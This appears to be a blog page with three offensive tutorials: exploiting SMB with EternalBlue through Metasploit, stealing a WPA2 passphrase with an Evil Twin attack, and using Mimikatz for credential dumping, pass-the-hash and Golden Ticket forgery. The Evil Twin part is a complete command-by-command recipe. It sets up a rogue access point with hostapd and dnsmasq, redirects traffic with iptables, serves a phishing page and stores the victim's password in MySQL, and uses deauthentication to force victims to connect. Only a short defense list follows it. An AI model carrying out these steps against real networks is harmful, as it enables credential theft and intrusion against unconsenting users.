Network penetration testing: SMB protocol

 

Understanding SMB

SMB is a network file and resource sharing protocol, which follows client server model. Any client present in a network can communicate with the SMB server to access resources such as files and directories or assign task like printing over the network.

How SMB Works?

SMB communication is not difficult to understand, where the SMB client connects to an SMB server using SMB port (445 for new version, old version used 139) and access the shares. Once the client gets the access to the shares, it can collaborate the share with its current system and use the files without downloading them to their machines or print using a network printer.

Versions of SMB

SMB v1: The first version of SMB. It began in 1980 and gone through multiple changes. Microsoft first implemented SMBv1 in Windows 95 by introducing CIFS(Common Internet File System). This version of SMB is highly vulnerable that it is never being suggested to use in modern network communication. Because it uses no encryption, which has been exploited by Wannacry and NotPetya like ransomware attacks.

SMBv2: This version was introduced with windows Vista. It improved the performance and offered security enhancement as compare to previous version. Later 2.1 version was introduced in windows 7 and windows server 2008 R2. Which has oplocks (Optimistic Locks) as a feature.

SMBv3: This is the latest and most secure version of SMB so far. It provides end-to-end encryption while communicating with the client. It first came up with windows 8 and server 2012, later v3.2 was introduced in 8.1 and Server 2012 R2. The latest update is 3.1.1 which is using in windows 10 and server 2016.

Enumeration:

In this phase as pentester one should look for the following information from SMB service:

-        Banner grabbing

-        User Listing

-        User Workgroup

-        Network Share information

-        Remote Operating system

-        SMB security version

To get the above detail we are using popular network scanning tool nmap.

               nmap –p 445,139 –A 192.168.1.10

The information we get from the result is:

Operating System: Windows 7  Ultimate

Computername: WIN-8KGN3AE06PK

SMB Security Mode: 2.02

 

Scanning for vulnerabilities:

After enumeration we get the version information and the host operation system. Now it is time for vulnerability scanning. Again we are using nmap to do so. As nmap is having end number of scripts to identify vulnerability.

                              nmap - - script smb-vuln* -p 445 192.168.1.10

 The scanning results shows the host is highly vulnerable to eternalblue(Ms17-010) vulnerability due to SMBv1.

Exploiting SMB vulnerability:

Now we have the vulnerability information so we will exploit the vulnerability using metasploit and gain the privilege.

We run the following modules in our attacker system:

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> set rhost <Victim IP>

> exploit

-

 

Closing words:

This is not the only way to exploiting SMB as there are other ways like PSExec, Bruteforce , NTLM capture.

I feel the above technique is not that complex, as Metasploit always makes hackers life easy.

I hope you find this article valuable and helpful. Happy Hacking!!

Read more →

Hacking WPA2 Wi-Fi password using Evil Twin Attack | DNSMASQ and Hostapd

Wireless protocols have drastically evolved since 2003 after the invention of WPA in terms of secured Wi-Fi access. These days, wireless networks have become a part of our daily life. Almost every home, business, corporate sectors, stores, industries, and institutions have their personal Wireless AP (Access Point).  Moreover, to make the internet free to every individual, some organizations have established public open Wi-Fi APs in almost every public place, like airports, railway stations, libraries, bus terminals, etc. But when the question comes about security, even after implementing the best security practices available, a wireless network will always be less secure than a wired network, just like David Bernstein once said, “FOR EVERY LOCK, THERE IS SOMEONE OUT THERE TRYING TO PICK IT OR BREAK IT”.

An Evil Twin is like a rogue Wi-Fi AP (Access Point), where an attacker creates a fake AP to lure the users into thinking it is a trusted wireless network. The attacker amplifies the signal in a way that the victim automatically connects to the rogue AP because of its faster beaconing and strong range.

Practical Scenario: The logic behind an Evil Twin attack is so simple, you just have to create a fake access point with the same name of the targeted Wi-Fi. Then you need to create a webpage to show the victim that he needs to enter the password to access the internet and store it in a database.

Prerequisites: Below is a list of hardware and software used in this article. You can use any hardware as long as it is compatible with the software you will be using.

Hardware Used:

-          A Laptop (4gb RAM, Intel i5 processor)

-          USB Wireless TP-LINK Adapter – 150MBPS (TP-Link WN722N)

-          Wi-Fi dongle for internet connection / Ethernet with internet connectivity

Software Used:

-          VMWare workstation 14

-          Kali Linux 2019.2 OS

-          Airmon-ng, Airodump-ng, Airplay-ng

-          Dnsmasq

-          Iptables

-          Apache2

-          Mysql

-          Hostapd

Note:

Hostapd: It is used to create a fake targeted access point, be it WEP, WPA, WPA2 personal or enterprise secured. It should work.

Dnsmasq: It is used to resolve DNS  requests from/to a host. It can also act as a DHCP server.

Apache: It acts as a web-server to the victim. It will basically host the phishing webpage in the attacker’s system.

Mysql: It is used to store the credentials in the database, entered from the website.

Iptables: It is a firewall, used for the Linux based systems.

Step 1: Setup Environment

Update the operating system and install required packages.

-          sudo apt-get install update

-          sudo apt-get install dnsmasq hostapd apache2

Step 2: Configuration of NetworkManager

Before starting monitor mode, make sure your NetworkManager and airmon-ng don’t conflict with each other.

Open the configuration file of the NetworkManager and put the MAC address of the device that you want your NetworkManager to stop managing.

-          gedit /etc/NetworkManager/NetworkManager.conf

Now add the lines mentioned below at the end of the file:

-           [keyfile]
unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2

Note:

Please change  AA:BB:CC:DD:EE:FF(eth0) and A2:B2:C2:D2:E2:F2(wlan0) with your respective MAC Addresses.

Step 3:  Setup Wireless Interface

Find the wireless interface using iwconfig command. In my case it is wlan0:

-          iwconfig

Put the wireless interface in monitor mode using ‘airmon-ng’. A new interface will be created, in this case it is wlan0mon.

-          airmon-ng start wlan0

Now it’s time to start monitoring all the AIR packets using ‘airodump-ng’.

-          airodump-ng wlan0mon

In this case, I will target CH 9. Please note the target details.

-          BSSID: It is used to describe sections of a wireless local area network or WLAN. It recognizes the access point or router because it has a unique address that creates the wireless network.

-          CH (Channel number): It is the medium through which our wireless networks can send and receive data.

-          ESSID: It is an electronic marker or identifier that serves as an identification and address for your computer, or network device to connect to a wireless router or access point and then access the internet.

(Optional Step): Set tx-power of Wi-Fi card to max: 1000mW to set the best range

-          ifconfig wlan0mon down     # Bring down the interface

-          iw reg set US              # Set region to be US

-          ifconfig wlan0mon up       # Bring the interface up

-          iwconfig wlan0mon          # Check tx-power, should be 30dBm

●       tx-power stands for transmission power. By default it is set to 20dBm (Decibel metre) or 100mW.

●       tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.

If your country is set to US (United State) during installation,.your card should operate on 30 dBm (1000 mW)

Step 4: Setup Fake Access point

First of all, create a directory called “fakeap” under /root/fakeap.

-          mkdir /root/fakeap

-          cd /root/fakeap

Now create a new hostapd configuration file here and paste the below code inside it.

-          gedit hostapd.conf

Code:

interface=wlan0mon

driver=nl80211

ssid=[Fake AP Name] //Take it from the airodump-ng result

hw_mode=g

channel=[Fake AP Channel] //Take it from the airodump-ng result

macaddr_acl=0

ignore_broadcast_ssid=0

Note:

interface: Monitor mode Wireless Interface to use.

ssid: Fake Access Point ESSID (name).

channel: Fake AP Channel to operate on.

Next we just have to execute the .conf file using the below command and our rogue access point will be up and running.

-          hostapd hostapd.conf

Step 5: Set up DHCP

We will use dnsmasq to set up DHCP in the attacker machine. Dnsmasq with the support of forwarder is certainly fast and easy to modify and execute.

Open the terminal and create a configuration file for dnsmasq and paste the below code in it.

-          Gedit dnsmasq.conf

Code

interface=wlan0mon

dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h

dhcp-option=3,192.168.1.1

dhcp-option=6,192.168.1.1

server=8.8.8.8

log-queries

log-dhcp

listen-address=127.0.0.1

Note:

dhcp-range: IP Range for network clients. 12h is the lease time.

dhcp-option=3: Gateway IP for the networks.

dhcp-option=6: DNS Server.

listen-address: Bind DHCP to local IP.

Next you have to create the network gateway and assign netmask to the interface and add it in the routing table.

-          ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0

-          route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Now, let’s start the dnsmasq server.

Step6: Enable NAT by setting Firewall rules in iptables and set port forwarding

Enter the following commands to set-up NAT

-          iptables –flush

-          iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

-          iptables --append FORWARD --in-interface wlan0mon -j ACCEPT

-          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80

-          iptables -t nat -A POSTROUTING -j MASQUERADE

Now we will setup the port forwarding.

-          echo 1 > /proc/sys/net/ipv4/ip_forward

Step 7: Setup Phishing Site

We need a phishing site like a forged document or falsified page, where the user will be lured to enter the passphrase which will be stored in the attacker database.

You can create your own web application but let’s just download from the below link for now.

https://drive.google.com/file/d/1xChAUOHPiWiejbEKYmdyW--9aj7COzUR/view

Extract the .zip file in /root/fakeap/rogueap.

-          unzip rogueap.zip

Next move the content of rogueap/ to /var/www/html directory. Before that don’t forget to clean the content of /var/www/html.

-          rm -rf /var/www/html/*

-          mv root/fakeap/rogueap/* /var/www/html/

Step 8: Setup Apache server and Mysql database

We need a webserver to host the phishing website in the attacker’s machine. Please execute the below command to start the apache2 server.

-          service apache2 start

So we have our phishing web application ready. Now we  require a database to store the passwords  the victim will type and submit.

Open Mysql and execute the below commands.

-          service mysql start

-          mysql

-          mysql> create database rogueap;

-          mysql> create user rogueuser;

-          mysql> grant all on rogueap.* to 'rogueuser'@'localhost' identified by 'roguepassword';

-          mysql> use rogueap;

-          mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30));

-          mysql> ALTER DATABASE rogueap CHARACTER SET 'utf8';

Note: Don’t change any values in the above mentioned queries and inside /var/www/html/dbconnect.php, because this is where the credentials are defined. If you change any value of the database configuration you have to modify everywhere.

Step 9: DNS spoof and De-authentication

Now, just redirect the traffic to the Gateway IP of our forged network using dnsspoof.

-          dnsspoof -i wlan0mon

Finally, to make the targeted Wi-Fi down we will use airplay-ng, which will deauthenticate every user from the targeted Wi-Fi and make it unavailable by sending a high number of requests from our machine. That will force the victim to connect to our rogue access point.

Please execute the below command in the terminal window to de-authenticate the target.

-          aireplay-ng -00 -a AA:BB:CC:DD:EE:FF wlan0mon

-          Note: AA:BB:CC:DD:EE:FF, is the targeted Wi-Fi’s BSSID, you can get it from the result of airodump-ng.

Now, you just have to wait for the victim to connect with the Wi-Fi and visit any website, it will redirect to the phishing website.

The moment the victim enters the password it will be stored in our mysql database. To check the password, please execute the below query in mysql.

-          mysql> select * from wpa_keys;

The password is: p@ssword123

So that’s it. That is how you can create an Evil Twin and steal the password from the targeted Wi-Fi.

Defending Against an Evil Twin Attack

-          The best way to defend against the Evil Twin attack is to know about the tactic so that you can understand in which situation it should be taken as suspicious.

-          The moment you feel you abruptly disconnected from your trusted network and suddenly see an open wireless network with the same name of your trusted AP, you should take it as an abnormal incident.

-          It is recommended to never connect to an open Wi-Fi network, especially those who do not have encrypted communication.

-          If you see the router is updating, you can turn your Wi-Fi off and connect it via LAN to know what is going on.

- For validation purposes, you can connect with the open network from a restricted environment (sandbox) and check if it is asking for any credentials, put in any random credentials and see the response.

Read more →

Mimikatz: Credential harvest, Pass the hash, Golden Ticket

Mimikatz is a tool, built in C language and used to perform password harvesting in windows platform. It is very well known to extract clean text passwords, hash, PIN code, Kerberos tickets from memory and those credentials can then be used to perform lateral movement and access restricted information.

We can have two more optional components of mimikatz. One is called mimidrv, which is a driver to interact with windows kernel and another one is called mimilib, which is used to bypass AppLocker. Auth package/SSP, password filter, and sekurlsa for WinDBG. 

Mimikatz needs administrator or SYSTEM priviledge to get debug rights in order to do certain actions and connect with the LSASS process.

Relation between LSASS and MIMIKATZ:

LSASS.exe also known as Local Security Authority Subsystem Service which is responsible for giving Single Sign On features in windows, where an already logged-in user is not required authenticate every time whenever wants to access any resources. LSASS provides access not only to the authenticated users credentials but also to the open session credentials which is already running since the last boot. Mimikatz exploits this credential cache of LSASS service and provide the credential reports to the attackers in various formats.

Execution of Mimikatz:

In term of basic objective of Mimikatz, we can retrieve clear text password by using the commands “debug” and asking for the passwords. 

• priviledge::debug 
• sekurlsa::logonpassword

Mimikatz needs admin privilege in order to get the LSA (Local Security Authority) information. If it will run as standard user the LSA will return errors, and that way it will become useless.

Mimikatz returns different set of results in term of version of the Windows it is executed on. For example if we run the Mimikatz in XP, and the unpatched versions of Windows 7 and 8 we will not only retrieve the SIDs, usernames and domain details but also the passwords in clear text. Please find the below screenshot for your reference.

But from the beginning of the Windows 8.1 LSASS no longer stores cleartext passwords inside the memory. Similarly Windows 10 and Windows server 2012R2 provide null information in the password fields for wdigest and Kerberos providers.

Pass the hash with mimikatz:

From the above figure we got that plaintext password is no longer available in the LSASS memory, but no worries still we can retrieve the NTLM hash. Mimikatz allows to run a process as another user by using the retrieved hashes. The attacker authenticates the process to the local system by using the local user’s password hashes. This is known as pass the hash attack, where instead of following the time consuming process like crack the password from the NTLM hashes, it can directly pass the hash and allow us to access resources remotely using another user privilege. 

To pass the hash follow the below commands,

#sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>

In the above commands reflects as opening a new command window on the respective local machine with the hash of the another domain user name as “ShortUser”. 

The moment command prompt is popped up from the remote system a connection will be buildto a network recource on DC1. For confirmation we can use “net use” command in the command prompt followed by the <network share>.

C:\> net use \\dc1\fshare 

To view the user connection to the shared resource follow the below command

Golden Ticket Attack:

The previous attack is all about pass the NTLM hash of a valid user to get an existing session. Where Golden Ticket attack is one step ahead, where it will convince the target system that an invalid session is valid and get the access to it.

A Kerberos implemented Windows system trusts a Kerberos ticket only when it is signed by the hash of a ticket granting ticket. If the attacker somehow manages to get the NTLM hash of the Kerberos TGT account that can be used to signed any ticket of this system other than the legitimate one.

Mimikatz can be used here to get the krbtgt NTLM hash and generate ‘Golden Ticket’ and that can be used to give privilege to any session from any system. To create a Golden ticket the below four informations are must require.

•        An administrator username. (if unavailable, any privileged user will be fine)
•       The FQDN (Fully Qualified Domain Name)
•       The SID of the domain 
•       The NTLM hash of the krbtgt account

So we can get the above details by following the below ways.

        1)       The username can be anything existing or non-exiting but the chances of getting a valid session will be more with the existing username.

      

        2)       We can get a FQDL by executing “ipconfig /all”

3            3)       We can also get the domain SID by executing “whoami /user” command.

We can get the first three information from any system but for getting the krbtgt NTLM hash the attacker must get it from the Domain Controller. For this Mimikatz can be used to obtain the krbtgt NTLM hash using “lsadump::lsa /inject /name:krbtgt”.

With the above four information now we can proceed and create the Golden Ticket from any system by executing the below command in Mimikatz.

Mimikatz # kerberos::golden /user:<username> /domain:<domainname> /SID:<SID> /krbtgt: <krbtgt NTLM hash> /groups:501,502,512,513,518,519,520 /ticket:<ticketname.tck>

After execution of the above command the ticket will be generated with name of the /ticket parameter and the validity of the ticket will be ten years for long term data exfiltration activity.

Now for using the Golden Ticket we will use this from a elevated command prompt window and execute “Kerberos::ptt” (pass-the-ticket) command.

If we closely observe the above sceenshot then will find that first of all we have tried to connect the administrative share on \\DC1 but failed, and then applied a Mimikatz session with a Golden ticket, And right after that the access is granted.

I hope you have enjoyed reading this write-ups about Mimikatz, please let me know if you have any queries/feedback in the comment section. We will meet again in my next blog. Happy hacking!!

Read more →